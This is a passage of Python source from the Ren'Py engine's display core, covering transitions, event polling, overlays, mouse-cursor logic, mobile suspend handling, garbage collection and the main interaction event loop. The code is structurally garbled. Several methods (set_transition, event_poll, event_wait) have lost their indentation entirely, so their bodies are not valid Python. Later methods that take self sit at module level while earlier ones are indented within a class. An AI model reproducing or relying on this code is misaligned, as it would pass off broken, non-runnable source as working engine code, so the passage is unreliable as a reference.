            old_history = renpy.store._history # @UndefinedVariable
            renpy.store._history = False
            PPP("empty window")
            try:
                renpy.config.empty_window()
            finally:
                renpy.store._history = old_history
    def do_with(self, trans, paired, clear=False):
        """
        Runs the `with` statement transition `trans` (paired with
        `paired` for config.with_callback), performing an interaction
        for it. Falls back to with_none when there is no transition or
        transitions are suppressed. Returns the interaction result, or
        False when no interaction was run.
        """
        if renpy.config.with_callback:
            trans = renpy.config.with_callback(trans, paired)
        if (not trans) or self.suppress_transition:
            self.with_none()
            return False
        else:
            self.set_transition(trans)
            return self.interact(trans_pause=True,
                                 suppress_overlay=not renpy.config.overlay_during_with,
                                 mouse='with',
                                 clear=clear)
    def with_none(self, overlay=True):
        """
        Implements "with None": commits the current scene as the old
        scene for future transitions, clears overlay/transient layers,
        and resets side-image state.
        """
        PPP("start of with none")
        renpy.game.context().say_attributes = None
        # Show the window, if that's necessary.
        self.show_window()
        if overlay:
            self.compute_overlay()
        scene_lists = renpy.game.context().scene_lists
        # Layers with a pending transition keep their previous old
        # scene.
        for layer, d in self.compute_scene(scene_lists).iteritems():
            if layer not in self.transition:
                self.old_scene[layer] = d
        for i in renpy.config.overlay_layers:
            scene_lists.clear(i)
        scene_lists.replace_transient()
        scene_lists.shown_window = False
        if renpy.store._side_image_attributes_reset:
            renpy.store._side_image_attributes = None
            renpy.store._side_image_attributes_reset = False
def set_transition(self, transition, layer=None, force=False):
if self.suppress_transition and not force:
return
if transition is None:
self.transition.pop(layer, None)
else:
self.transition[layer] = transition
    def event_peek(self):
        """
        Returns the next pending event without consuming it, or None if
        the queue is empty. The peeked event is stored in pushed_event
        so event_poll/event_wait return it next.
        """
        if self.pushed_event:
            return self.pushed_event
        ev = pygame.event.poll()
        if ev.type == pygame.NOEVENT:
            # Idle: service background screenshot requests and let the
            # renderer sleep briefly.
            self.check_background_screenshot()
            renpy.display.draw.event_peek_sleep()
            return None
        self.pushed_event = ev
        return ev
def event_poll(self):
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
else:
rv = pygame.event.poll()
self.last_event = rv
return rv
def event_wait(self):
if self.pushed_event:
rv = self.pushed_event
self.pushed_event = None
self.last_event = rv
return rv
self.check_background_screenshot()
ev = pygame.event.wait()
self.last_event = ev
return ev
    def compute_overlay(self):
        """
        Builds the overlay layer by running the configured overlay
        functions (plus the window overlay functions when a window is
        shown), unless overlays are suppressed.
        """
        if renpy.store.suppress_overlay:
            return
        renpy.ui.layer("overlay")
        for i in renpy.config.overlay_functions:
            i()
        if renpy.game.context().scene_lists.shown_window:
            for i in renpy.config.window_overlay_functions:
                i()
        renpy.ui.close()
    def compute_scene(self, scene_lists):
        """
        Builds a map from layer name to that layer's displayable, plus
        a None entry holding the root MultiBox containing the
        non-top layers in order.
        """
        rv = { }
        for layer in renpy.config.layers + renpy.config.top_layers:
            rv[layer] = scene_lists.make_layer(layer, self.layer_properties[layer])
        root = renpy.display.layout.MultiBox(layout='fixed')
        root.layers = { }
        for layer in renpy.config.layers:
            root.layers[layer] = rv[layer]
            root.add(rv[layer])
        rv[None] = root
        return rv
    def quit_event(self):
        """
        Handles a window-close request. Runs config.quit_action when one
        is set; quits immediately (saving) when none is set, when the
        close button is pressed twice within 0.75s, or when already
        inside a quit event.
        """
        if self.screenshot is None:
            renpy.exports.take_screenshot()
        if self.quit_time > (time.time() - .75):
            renpy.exports.quit(save=True)
        if self.in_quit_event:
            renpy.exports.quit(save=True)
        if renpy.config.quit_action is not None:
            self.quit_time = time.time()
            # Make the screen more suitable for interactions.
            renpy.exports.movie_stop(only_fullscreen=True)
            renpy.store.mouse_visible = True
            try:
                self.in_quit_event = True
                renpy.display.behavior.run(renpy.config.quit_action)
            finally:
                self.in_quit_event = False
        else:
            renpy.exports.quit(save=True)
    def get_mouse_info(self):
        """
        Returns (hardware, x-offset, y-offset, texture) describing the
        mouse cursor: the hardware cursor with no texture, or an
        animated software cursor frame from config.mouse.
        """
        # Hide the mouse after config.mouse_hide_time seconds of
        # inactivity.
        if (renpy.config.mouse_hide_time is not None) and (self.mouse_event_time + renpy.config.mouse_hide_time < renpy.display.core.get_time()):
            visible = False
        else:
            visible = renpy.store.mouse_visible and (not renpy.game.less_mouse)
        visible = visible and self.show_mouse and not (renpy.display.video.fullscreen)
        if not visible:
            return False, 0, 0, None
        # No software cursors configured: use the hardware cursor.
        if not renpy.config.mouse:
            return True, 0, 0, None
        if not self.mouse_focused:
            return False, 0, 0, None
        mouse_kind = renpy.display.focus.get_mouse() or self.mouse
        if mouse_kind in renpy.config.mouse:
            anim = renpy.config.mouse[mouse_kind]
        else:
            anim = renpy.config.mouse[getattr(renpy.store, 'default_mouse', 'default')]
        # Pick the animation frame for the current tick.
        img, x, y = anim[self.ticks % len(anim)]
        rend = renpy.display.im.load_image(img)
        tex = rend.children[0][0]
        xo = rend.children[0][1]
        yo = rend.children[0][2]
        return False, x - xo, y - yo, tex
    def set_mouse_pos(self, x, y, duration):
        """Starts warping the mouse pointer to (x, y) over `duration` seconds."""
        self.mouse_move = MouseMove(x, y, duration)
        self.force_redraw = True
    def drawn_since(self, seconds_ago):
        """Returns true if a frame was drawn within the last `seconds_ago` seconds."""
        return (get_time() - self.frame_time) <= seconds_ago
    def check_suspend(self, ev):
        """
        Handles mobile suspend/terminate events: saves a reload slot,
        pauses audio and timers, then blocks until the app returns to
        the foreground (or exits). Returns True if a suspend was
        handled, False otherwise.
        """
        def save():
            # Save a reload slot so the session survives being killed
            # in the background.
            if renpy.config.save_on_mobile_background and (not renpy.store.main_menu):
                renpy.loadsave.save("_reload-1")
            renpy.persistent.update(True)
        if ev.type == pygame.APP_TERMINATING:
            save()
            sys.exit(0)
        if ev.type != pygame.APP_WILLENTERBACKGROUND:
            return False
        renpy.audio.audio.pause_all()
        if android:
            android.wakelock(False)
        pygame.time.set_timer(PERIODIC, 0)
        pygame.time.set_timer(REDRAW, 0)
        pygame.time.set_timer(TIMEEVENT, 0)
        save()
        if renpy.config.quit_on_mobile_background:
            sys.exit(0)
        renpy.exports.free_memory()
        print("Entered background.")
        # Block until the app is foregrounded again or terminated.
        while True:
            ev = pygame.event.wait()
            if ev.type == pygame.APP_DIDENTERFOREGROUND:
                break
            if ev.type == pygame.APP_TERMINATING:
                sys.exit(0)
        print("Entering foreground.")
        # Since we came back to life, we can get rid of the
        # auto-reload.
        renpy.loadsave.unlink_save("_reload-1")
        pygame.time.set_timer(PERIODIC, PERIODIC_INTERVAL)
        renpy.audio.audio.unpause_all()
        if android:
            android.wakelock(True)
        # Reset the display so we get the GL context back.
        self.display_reset = True
        self.restart_interaction = True
        return True
    def iconified(self):
        """Records that the window was minimized (once per minimize)."""
        if self.minimized:
            return
        self.minimized = True
        renpy.display.log.write("The window was minimized.")
    def restored(self):
        """
        Handles the window being restored from a minimized state,
        resetting the display on Windows.
        """
        # This is necessary on Windows/DirectX/Angle, as otherwise we get
        # a blank screen.
        if not self.minimized:
            return
        self.minimized = False
        renpy.display.log.write("The window was restored.")
        if renpy.windows:
            self.display_reset = True
            self.set_mode(self.last_resize)
    def enter_context(self):
        """Called when a new context is entered; clears transition state."""
        # Stop ongoing transitions.
        self.ongoing_transition.clear()
        self.transition_from.clear()
        self.transition_time.clear()
def post_time_event(self):
    """Post a TIMEEVENT to the pygame event queue.

    Best-effort: posting can fail (e.g. when the queue is full or the
    video system is shutting down), and that failure is deliberately
    ignored rather than crashing the event loop.
    """
    try:
        pygame.event.post(self.time_event)
    except:
        pass
def after_longpress(self):
    """Called after a touchscreen long-press gesture.

    Subsequent touch events are ignored until the touch ends, and mouse
    focus is cleared by reporting an off-screen position.
    """
    self.ignore_touch = True
    renpy.display.focus.mouse_handler(None, -1, -1, default=False)
def text_event_in_queue(self):
    """Return True if the next queued event is an IME text input/editing event."""
    pending = self.event_peek()
    return (pending is not None) and pending.type in (pygame.TEXTINPUT, pygame.TEXTEDITING)
def update_text_rect(self):
    """Update the on-screen text-input rectangle and IME state.

    Starts text input (and positions the IME candidate window) when a
    text rect is active, and stops it when the rect goes away.
    """

    # Allow creator code to override the rect via the _text_rect store
    # variable.
    if renpy.store._text_rect is not None:  # @UndefinedVariable
        self.text_rect = renpy.store._text_rect  # @UndefinedVariable

    if self.text_rect is not None:

        # True when a screen keyboard exists but is currently hidden,
        # in which case we re-request text input to pop it up.
        not_shown = pygame.key.has_screen_keyboard_support() and not pygame.key.is_screen_keyboard_shown()  # @UndefinedVariable

        if self.old_text_rect != self.text_rect:
            # Convert the virtual-coordinate rect into window
            # coordinates before handing it to SDL.
            x, y, w, h = self.text_rect
            x0, y0 = renpy.display.draw.untranslate_point(x, y)
            x1, y1 = renpy.display.draw.untranslate_point(x + w, y + h)
            rect = (x0, y0, x1 - x0, y1 - y0)

            pygame.key.set_text_input_rect(rect)  # @UndefinedVariable

        if not self.old_text_rect or not_shown:
            pygame.key.start_text_input()  # @UndefinedVariable

    else:
        if self.old_text_rect:
            pygame.key.stop_text_input()  # @UndefinedVariable
            pygame.key.set_text_input_rect(None)  # @UndefinedVariable

    self.old_text_rect = self.text_rect
def maximum_framerate(self, t):
    """Request maximum-framerate drawing for the next `t` seconds.

    Passing None cancels any outstanding request. Requests never shorten
    an existing deadline; the later of the two deadlines wins.
    """
    if t is None:
        self.maximum_framerate_time = 0
    else:
        deadline = get_time() + t
        self.maximum_framerate_time = max(self.maximum_framerate_time, deadline)
def interact(self, clear=True, suppress_window=False, trans_pause=False, **kwargs):
    """Run one interaction between the player and the game.

    Repeatedly calls interact_core until it reports that no restart is
    needed, then returns the value produced by the displayable that
    ended the interaction. Extra keyword arguments are forwarded to
    interact_core.

    `clear`
        If true, transient scene elements are removed when the
        interaction finishes.
    `suppress_window`
        If true, the auto-shown "missing" window is not displayed.
    `trans_pause`
        If true, this interaction exists to pause for a transition.
    """

    renpy.plog(1, "start of new interaction")

    if not self.started:
        self.start()

    if self.clear_screenshot:
        self.lose_screenshot()

    self.clear_screenshot = False

    self.trans_pause = trans_pause

    # Cancel magic error reporting.
    renpy.bootstrap.report_error = None

    context = renpy.game.context()

    if context.interacting:
        raise Exception("Cannot start an interaction in the middle of an interaction, without creating a new context.")

    context.interacting = True

    # Show a missing window.
    if not suppress_window:
        self.show_window()

    # These things can be done once per interaction.
    preloads = self.preloads
    self.preloads = [ ]

    try:
        for i in renpy.config.start_interact_callbacks:
            i()

        repeat = True

        self.start_interact = True

        # interact_core returns (repeat, rv); loop until it no longer
        # asks to be restarted.
        while repeat:
            repeat, rv = self.interact_core(preloads=preloads, trans_pause=trans_pause, **kwargs)
            self.start_interact = False

        return rv

    finally:
        context.interacting = False

        # Clean out transient stuff at the end of an interaction.
        if clear:
            scene_lists = renpy.game.context().scene_lists
            scene_lists.replace_transient()

        self.ongoing_transition = { }
        self.transition_time = { }
        self.transition_from = { }

        self.restart_interaction = True

        renpy.game.context().mark_seen()
        renpy.game.context().scene_lists.shown_window = False

        if renpy.game.log is not None:
            renpy.game.log.did_interaction = True

        # Reset the side image attributes if they were flagged for reset.
        if renpy.store._side_image_attributes_reset:
            renpy.store._side_image_attributes = None
            renpy.store._side_image_attributes_reset = False
def consider_gc(self):
    """Run an explicit garbage-collection pass when enough objects have piled up.

    Only active when renpy.config.manage_gc is set. The generation to
    collect is picked from the configured per-generation thresholds,
    and any uncollectable garbage found is reported and discarded.
    """

    if not renpy.config.manage_gc:
        return

    counts = gc.get_count()

    if counts[0] < renpy.config.idle_gc_count:
        return

    renpy.plog(2, "before gc")

    thresholds = renpy.config.gc_thresholds

    if counts[2] >= thresholds[2]:
        generation = 2
    elif counts[1] >= thresholds[1]:
        generation = 1
    else:
        generation = 0

    gc.collect(generation)

    if gc.garbage:
        renpy.memory.print_garbage(generation)
        gc.garbage[:] = [ ]

    renpy.plog(2, "after gc")
def idle_frame(self, can_block, expensive):
    """Perform deferred housekeeping while the event loop is idle.

    Steps through GC, texture upload, screen prediction, web preloading
    and autosave, in that order. Stops early when an event arrives, or
    (when not allowed to block expensively) when a small time budget
    runs out.
    """

    if expensive:
        renpy.plog(1, "start idle_frame (expensive)")
    else:
        renpy.plog(1, "start idle_frame (inexpensive)")

    # We want this to include the GC time, so we don't predict on
    # frames where the GC budget was already consumed.
    start = get_time()

    step = 1

    while True:

        # Stop as soon as there is an event to handle.
        if self.event_peek():
            break

        # When we can't block expensively, stay within a ~0.5ms budget.
        if not (can_block and expensive):
            if get_time() > (start + .0005):
                break

        if step == 1:
            self.consider_gc()
            step += 1

        elif step == 2:
            renpy.display.draw.ready_one_texture()
            step += 1

        elif step == 3:
            if not self.prediction_coroutine:
                step += 1
                continue

            try:
                result = self.prediction_coroutine.send(expensive)
            except ValueError:
                # The coroutine may have been closed out from under us.
                result = None

            if result is None:
                # Prediction is finished.
                self.prediction_coroutine = None
                step += 1

            elif result is False:
                # Prediction wants an expensive pass; only advance if we
                # can't provide one.
                if not expensive:
                    step += 1

        elif step == 4:
            if expensive and renpy.emscripten:
                renpy.display.im.cache.preload_thread_pass()
            step += 1

        elif step == 5:
            if not self.did_autosave:
                renpy.loadsave.autosave()
                renpy.persistent.check_update()
                self.did_autosave = True
            step += 1

        else:
            break

    if expensive:
        renpy.plog(1, "end idle_frame (expensive)")
    else:
        renpy.plog(1, "end idle_frame (inexpensive)")
def interact_core(self,
                  show_mouse=True,
                  trans_pause=False,
                  suppress_overlay=False,
                  suppress_underlay=False,
                  mouse='default',
                  preloads=[],
                  roll_forward=None,
                  ):
    """Run one pass of the interaction event loop.

    Builds the widget tree for the current scene (including transitions,
    under/overlays and top layers), then loops processing pygame events
    until a displayable produces a result. Returns a (restart, rv)
    tuple: restart is True when the whole interaction must be rebuilt,
    and rv is the interaction's result (None when restarting).

    NOTE(review): `preloads` uses a mutable default argument; it is
    never mutated here, but callers should still pass their own list.
    """

    renpy.plog(1, "start interact_core")

    suppress_overlay = suppress_overlay or renpy.store.suppress_overlay

    self.suppress_overlay = suppress_overlay
    self.suppress_underlay = suppress_underlay
    self.trans_pause = trans_pause

    renpy.display.screen.show_overlay_screens(suppress_overlay)
    renpy.display.screen.prepare_screens()

    self.roll_forward = roll_forward
    self.show_mouse = show_mouse

    # Skipping (or "less updates" mode) cancels all transitions.
    suppress_transition = renpy.config.skipping or renpy.game.less_updates
    self.suppress_transition = False

    if suppress_transition:
        self.ongoing_transition.clear()
        self.transition_from.clear()
        self.transition_time.clear()
    else:
        # Move newly requested transitions into the ongoing set,
        # remembering the outgoing scene for each layer.
        for k in self.transition:
            if k not in self.old_scene:
                continue
            self.ongoing_transition[k] = self.transition[k]
            self.transition_from[k] = self.old_scene[k]._in_current_store()
            self.transition_time[k] = None

    self.transition.clear()

    # A transition-pause interaction is pointless without an actual
    # top-level transition to wait for.
    if trans_pause:
        if not self.ongoing_transition:
            return False, None
        if None not in self.ongoing_transition:
            return False, None
        if suppress_transition:
            return False, None
        if not self.old_scene:
            return False, None

    renpy.translation.check_language()

    self.restart_interaction = False

    self.mouse = mouse

    start_time = get_time()
    end_time = start_time

    for i in renpy.config.interact_callbacks:
        i()

    self.set_window_caption()

    # Tick per-interaction caches forward.
    renpy.display.im.cache.tick()
    renpy.text.text.text_tick()
    renpy.display.predict.reset()

    renpy.display.layout.size_groups.clear()
    renpy.display.screen.updated_screens.clear()

    # Drop stale motion/timer events left over from the last interaction.
    pygame.event.clear((pygame.MOUSEMOTION,
                        PERIODIC,
                        TIMEEVENT,
                        REDRAW))

    self.post_time_event()

    scene_lists = renpy.game.context().scene_lists
    scene_lists.remove_hidden()

    if not suppress_overlay:
        self.compute_overlay()

    # The root of everything displayed this interaction.
    root_widget = renpy.display.layout.MultiBox(layout='fixed')
    root_widget.layers = { }

    # Roots of the trees considered for focus handling.
    focus_roots = [ ]

    if not suppress_underlay:
        for i in renpy.config.underlay:
            root_widget.add(i)
            focus_roots.append(i)

    if roll_forward is not None:
        rfw = renpy.display.behavior.RollForward(roll_forward)
        root_widget.add(rfw)
        focus_roots.append(rfw)

    scene = self.compute_scene(scene_lists)
    renpy.display.tts.set_root(scene[None])

    renpy.plog(1, "computed scene")

    # Best-effort prediction of everything in the scene.
    for w in scene.itervalues():
        try:
            renpy.display.predict.displayable(w)
        except:
            pass

    renpy.plog(1, "final predict")

    layers_root = renpy.display.layout.MultiBox(layout='fixed')
    layers_root.layers = { }

    def add_layer(where, layer):
        # Adds `layer` of the scene to `where`, wrapping it in its
        # per-layer transition when one is ongoing.

        scene_layer = scene[layer]
        focus_roots.append(scene_layer)

        if (self.ongoing_transition.get(layer, None) and
                not suppress_transition):

            trans = self.ongoing_transition[layer](
                old_widget=self.transition_from[layer],
                new_widget=scene_layer)

            if not isinstance(trans, Displayable):
                raise Exception("Expected transition to be a displayable, not a %r" % trans)

            transition_time = self.transition_time.get(layer, None)

            where.add(trans, transition_time, transition_time)
            where.layers[layer] = trans

        else:
            where.layers[layer] = scene_layer
            where.add(scene_layer)

    for layer in renpy.config.layers:
        add_layer(layers_root, layer)

    # Add the top-level (whole-screen) transition, if any.
    if (self.ongoing_transition.get(None, None) and
            not suppress_transition):

        # Reconstruct the outgoing screen from the saved per-layer scene.
        old_root = renpy.display.layout.MultiBox(layout='fixed')
        old_root.layers = { }

        for layer in renpy.config.layers:
            d = self.transition_from[None].layers[layer]
            old_root.layers[layer] = d
            old_root.add(d)

        trans = self.ongoing_transition[None](
            old_widget=old_root,
            new_widget=layers_root)

        if not isinstance(trans, Displayable):
            raise Exception("Expected transition to be a displayable, not a %r" % trans)

        trans._show()

        transition_time = self.transition_time.get(None, None)
        root_widget.add(trans, transition_time, transition_time)

        if trans_pause:

            if renpy.store._dismiss_pause:
                sb = renpy.display.behavior.SayBehavior()
            else:
                sb = renpy.display.behavior.SayBehavior(dismiss='dismiss_hard_pause')

            root_widget.add(sb)
            focus_roots.append(sb)

            # End the pause automatically when the transition finishes.
            pb = renpy.display.behavior.PauseBehavior(trans.delay)
            root_widget.add(pb, transition_time, transition_time)
            focus_roots.append(pb)

    else:
        root_widget.add(layers_root)

    # Layers that are never transitioned go above everything else.
    for layer in renpy.config.top_layers:
        add_layer(root_widget, layer)

    for i in renpy.display.emulator.overlay:
        root_widget.add(i)

    del add_layer

    # Prime the screen-prediction coroutine; it is advanced in idle_frame.
    self.prediction_coroutine = renpy.display.predict.prediction_coroutine(root_widget)
    self.prediction_coroutine.send(None)

    renpy.display.behavior.adj_registered.clear()

    renpy.display.video.early_interact()

    # Per-interaction setup for every widget in the tree.
    renpy.display.behavior.input_pre_per_interact()
    root_widget.visit_all(lambda i : i.per_interact())
    renpy.display.behavior.input_post_per_interact()

    self.old_scene = scene

    renpy.display.focus.before_interact(focus_roots)

    # A per_interact handler may already have asked for a restart; honor
    # it before entering the event loop.
    if self.restart_interaction:
        return True, None

    # Redraw the screen.
    needs_redraw = True

    # First pass through the while loop?
    first_pass = True

    # We don't yet know when the interaction began.
    self.interact_time = None

    self.did_autosave = False

    old_timeout_time = None
    old_redraw_time = None

    rv = None

    renpy.audio.audio.interact()

    _redraw_in = 3600
    video_frame_drawn = False

    renpy.game.after_rollback = False

    # How many frames have we shown so far?
    frame = 0

    can_block = False

    # This try block is used to force cleanup even on termination
    # caused by an exception propagating through this function.
    try:

        while rv is None:

            renpy.plog(1, "start of interact while loop")

            renpy.execution.not_infinite_loop(10)

            # Check for a change in fullscreen preference.
            if ((self.fullscreen != renpy.game.preferences.fullscreen) or
                    self.display_reset or (renpy.display.draw is None)):
                self.set_mode()
                needs_redraw = True

            # Check for autoreload.
            if renpy.loader.needs_autoreload:
                renpy.loader.needs_autoreload = False
                renpy.exports.reload_script()

            for i in renpy.config.needs_redraw_callbacks:
                if i():
                    needs_redraw = True

            # Redraw the screen.
            if (self.force_redraw or
                    ((first_pass or not pygame.event.peek(ALL_EVENTS)) and
                     renpy.display.draw.should_redraw(needs_redraw, first_pass, can_block))):

                self.force_redraw = False

                renpy.display.render.process_redraws()

                # If we have a movie, start showing it.
                fullscreen_video = renpy.display.video.interact()

                # Clean out the redraws, if we have to.
                # renpy.display.render.kill_redraws()

                self.text_rect = None

                # Draw the screen.
                self.frame_time = get_time()

                renpy.audio.audio.advance_time() # Sets the time of all video frames.

                self.draw_screen(root_widget, fullscreen_video, (not fullscreen_video) or video_frame_drawn)

                if first_pass:
                    if not self.interact_time:
                        self.interact_time = max(self.frame_time, get_time() - self.frame_duration)

                    scene_lists.set_times(self.interact_time)

                    for k, v in self.transition_time.iteritems():
                        if v is None:
                            self.transition_time[k] = self.interact_time

                    renpy.display.render.adjust_render_cache_times(self.frame_time, self.interact_time)

                frame += 1
                renpy.config.frames += 1

                # If profiling is enabled, report the profile time.
                if renpy.config.profile or self.profile_once:

                    renpy.plog(0, "end frame")
                    renpy.performance.analyze()
                    renpy.performance.clear()
                    renpy.plog(0, "start frame")

                    self.profile_once = False

                # Re-run focus with the last pointer event so the newly
                # drawn screen reflects what is under the cursor.
                if first_pass and self.last_event and self.last_event.type in [ pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION ]:

                    x, y = renpy.display.draw.get_mouse_pos()
                    ev, x, y = renpy.display.emulator.emulator(self.last_event, x, y)

                    if self.ignore_touch:
                        x = -1
                        y = -1

                    if renpy.android and self.last_event.type == pygame.MOUSEBUTTONUP:
                        x = -1
                        y = -1

                    renpy.display.focus.mouse_handler(None, x, y, default=False)

                needs_redraw = False
                first_pass = False

                pygame.time.set_timer(REDRAW, 0)
                pygame.event.clear([REDRAW])
                old_redraw_time = None

                self.update_text_rect()

            renpy.test.testexecution.execute()

            # Move the mouse, if necessary.
            if self.mouse_move is not None:
                if not self.mouse_move.perform():
                    self.mouse_move = None

            # Draw the mouse, if it needs drawing.
            renpy.display.draw.update_mouse()

            # See if we want to restart the interaction entirely.
            if self.restart_interaction:
                return True, None

            # Determine if we need a redraw. (We want to run these
            # functions, so we put them first to prevent short-circuiting.)

            if renpy.display.video.frequent():
                needs_redraw = True
                video_frame_drawn = True

            if renpy.display.render.check_redraws():
                needs_redraw = True

            # How many seconds until we timeout.
            _timeout_in = 3600

            # Handle the redraw timer.
            redraw_time = renpy.display.render.redraw_time()

            # We only need to set the REDRAW timer if we can block.
            can_block = renpy.display.draw.can_block()

            if self.maximum_framerate_time > get_time():
                can_block = False

            if (redraw_time is not None) and (not needs_redraw) and can_block:

                if redraw_time != old_redraw_time:

                    time_left = redraw_time - get_time()
                    time_left = min(time_left, 3600)
                    _redraw_in = time_left

                    if time_left <= 0:
                        # Already due: post the redraw event directly.
                        try:
                            pygame.event.post(self.redraw_event)
                        except:
                            pass
                        pygame.time.set_timer(REDRAW, 0)
                    else:
                        pygame.time.set_timer(REDRAW, max(int(time_left * 1000), 1))

                    old_redraw_time = redraw_time
            else:
                _redraw_in = 3600
                pygame.time.set_timer(REDRAW, 0)

            # Handle the timeout timer.
            if not self.timeout_time:
                pygame.time.set_timer(TIMEEVENT, 0)
            else:
                time_left = self.timeout_time - get_time()
                time_left = min(time_left, 3600)
                _timeout_in = time_left

                if time_left <= 0:
                    self.timeout_time = None
                    pygame.time.set_timer(TIMEEVENT, 0)
                    self.post_time_event()

                elif self.timeout_time != old_timeout_time:
                    # Always set to at least 1ms.
                    pygame.time.set_timer(TIMEEVENT, int(time_left * 1000 + 1))
                    old_timeout_time = self.timeout_time

            # Use spare time for housekeeping; an "expensive" pass is
            # allowed only when nothing is due soon.
            if can_block or (frame >= renpy.config.idle_frame):
                expensive = not ( needs_redraw or (_redraw_in < .2) or (_timeout_in < .2) or renpy.display.video.playing() )
                self.idle_frame(can_block, expensive)

            if needs_redraw or (not can_block) or self.mouse_move or renpy.display.video.playing():
                renpy.plog(1, "pre peek")
                ev = self.event_poll()
                renpy.plog(1, "post peek {!r}", ev)
            else:
                renpy.plog(1, "pre wait")
                ev = self.event_wait()
                renpy.plog(1, "post wait {!r}", ev)

            if ev.type == pygame.NOEVENT:

                if can_block and (not needs_redraw) and (not self.prediction_coroutine) and (not self.mouse_move):
                    # Nothing to do at all: yield the CPU briefly.
                    pygame.time.wait(1)

                continue

            # Recognize and ignore AltGr on Windows.
            if ev.type == pygame.KEYDOWN:
                if ev.key == pygame.K_LCTRL:

                    ev2 = self.event_peek()

                    if (ev2 is not None) and (ev2.type == pygame.KEYDOWN):
                        if ev2.key == pygame.K_RALT:
                            continue

            # Check to see if the OS is asking us to suspend (on Android
            # and iOS.)
            if self.check_suspend(ev):
                continue

            # Try to merge an TIMEEVENT with other timeevents.
            if ev.type == TIMEEVENT:
                old_timeout_time = None
                pygame.event.clear([TIMEEVENT])

            # On Android, where we have multiple mouse buttons, we can
            # merge a mouse down and mouse up event with its successor. This
            # prevents us from getting overwhelmed with too many events on
            # a multitouch screen.
            if android and (ev.type == pygame.MOUSEBUTTONDOWN or ev.type == pygame.MOUSEBUTTONUP):
                pygame.event.clear(ev.type)

            # Handle redraw timeouts.
            if ev.type == REDRAW:
                pygame.event.clear([REDRAW])
                old_redraw_time = None
                continue

            # Handle periodic events. This includes updating the mouse timers (and through the loop,
            # the mouse itself), and the audio system periodic calls.
            if ev.type == PERIODIC:
                events = 1 + len(pygame.event.get([PERIODIC]))
                self.ticks += events

                for i in renpy.config.periodic_callbacks:
                    i()

                renpy.audio.audio.periodic()
                renpy.display.tts.periodic()
                continue

            # Handle quit specially for now.
            if ev.type == pygame.QUIT:
                self.quit_event()
                continue

            # Ignore KEY-events while text is being edited (usually with an IME).
            if ev.type == pygame.TEXTEDITING:
                if ev.text:
                    self.text_editing = ev
                else:
                    self.text_editing = None

            elif ev.type == pygame.TEXTINPUT:
                self.text_editing = None

            elif self.text_editing and ev.type in [ pygame.KEYDOWN, pygame.KEYUP ]:
                continue

            if ev.type == pygame.VIDEOEXPOSE:
                # Needed to force the display to redraw after expose in
                # the software renderer.
                renpy.game.interface.full_redraw = True
                renpy.game.interface.force_redraw = True

                if isinstance(renpy.display.draw, renpy.display.swdraw.SWDraw):
                    renpy.display.draw.full_redraw = True

                continue

            # Handle videoresize.
            if ev.type == pygame.VIDEORESIZE:
                evs = pygame.event.get([pygame.VIDEORESIZE])

                # Coalesce to the most recent resize event.
                if len(evs):
                    ev = evs[-1]

                # We seem to get a spurious event like this when leaving
                # fullscreen mode on windows.
                if ev.w < 256 or ev.h < 256:
                    continue

                size = (ev.w // self.dpi_scale, ev.h // self.dpi_scale)

                # Refresh fullscreen status (e.g. user pressed Esc. in browser)
                main_window = pygame.display.get_window()
                self.fullscreen = main_window is not None and bool(main_window.get_window_flags() & (pygame.WINDOW_FULLSCREEN_DESKTOP|pygame.WINDOW_FULLSCREEN))
                renpy.game.preferences.fullscreen = self.fullscreen

                if pygame.display.get_surface().get_size() != ev.size:
                    self.set_mode(size)

                if not self.fullscreen:
                    self.last_resize = size

                continue

            # If we're ignoring touch events, and get a mouse up, stop
            # ignoring them.
            if self.ignore_touch and \
                    ev.type == pygame.MOUSEBUTTONUP and \
                    ev.button == 1:

                self.ignore_touch = False
                continue

            if ev.type == pygame.MOUSEMOTION:
                evs = pygame.event.get([pygame.MOUSEMOTION])

                # Coalesce to the most recent motion event.
                if len(evs):
                    ev = evs[-1]

                if renpy.windows:
                    self.mouse_focused = True

            if ev.type == pygame.MOUSEMOTION or \
                    ev.type == pygame.MOUSEBUTTONDOWN or \
                    ev.type == pygame.MOUSEBUTTONUP:

                self.mouse_event_time = renpy.display.core.get_time()

                if self.ignore_touch:
                    renpy.display.focus.mouse_handler(None, -1, -1, default=False)

            if ev.type == pygame.ACTIVEEVENT:

                if ev.state & 1:
                    if not ev.gain:
                        renpy.display.focus.clear_focus()

                    self.mouse_focused = ev.gain

                if ev.state & 2:
                    self.keyboard_focused = ev.gain

                if ev.state & 4:
                    if ev.gain:
                        self.restored()
                    else:
                        self.iconified()

                pygame.key.set_mods(0)

            x, y = renpy.display.draw.mouse_event(ev)
            x, y = renpy.test.testmouse.get_mouse_pos(x, y)

            ev, x, y = renpy.display.emulator.emulator(ev, x, y)
            if ev is None:
                continue

            if not self.mouse_focused or self.ignore_touch:
                x = -1
                y = -1

            # This can set ev to a falsy value, which means: ignore it.
            ev = renpy.display.controller.event(ev)
            if not ev:
                continue

            renpy.display.behavior.skipping(ev)

            self.event_time = end_time = get_time()

            try:

                if self.touch:
                    renpy.display.gesture.recognizer.event(ev, x, y)

                # Handle the event normally: focus, widgets, then keys.
                rv = renpy.display.focus.mouse_handler(ev, x, y)

                if rv is None:
                    rv = root_widget.event(ev, x, y, 0)

                if rv is None:
                    rv = renpy.display.focus.key_handler(ev)

                if rv is not None:
                    break

                # Displayable inspector bindings.
                if renpy.config.inspector:
                    if renpy.display.behavior.map_event(ev, "inspector"):
                        l = self.surftree.main_displayables_at_point(x, y, renpy.config.transient_layers + renpy.config.context_clear_layers + renpy.config.overlay_layers)
                        renpy.game.invoke_in_new_context(renpy.config.inspector, l)
                    elif renpy.display.behavior.map_event(ev, "full_inspector"):
                        l = self.surftree.main_displayables_at_point(x, y, renpy.config.layers)
                        renpy.game.invoke_in_new_context(renpy.config.inspector, l)

            except IgnoreEvent:
                # An ignored event can still change the timeout, so make
                # sure a TIMEEVENT is processed to recompute it.
                if ev.type != TIMEEVENT:
                    self.post_time_event()

            needs_redraw |= renpy.display.render.check_redraws()

            if self.restart_interaction:
                return True, None

        if trans_pause and rv:
            self.suppress_transition = True

        # The finally block below runs the cleanup that happens
        # after this.
        return False, rv

    except EndInteraction as e:
        return False, e.value

    finally:

        renpy.game.context().say_attributes = None

        # Clean out the overlay layers.
        for i in renpy.config.overlay_layers:
            scene_lists.clear(i)

        # Stop ongoing preloading.
        renpy.display.im.cache.end_tick()

        # We no longer disable periodic between interactions.
        # pygame.time.set_timer(PERIODIC, 0)

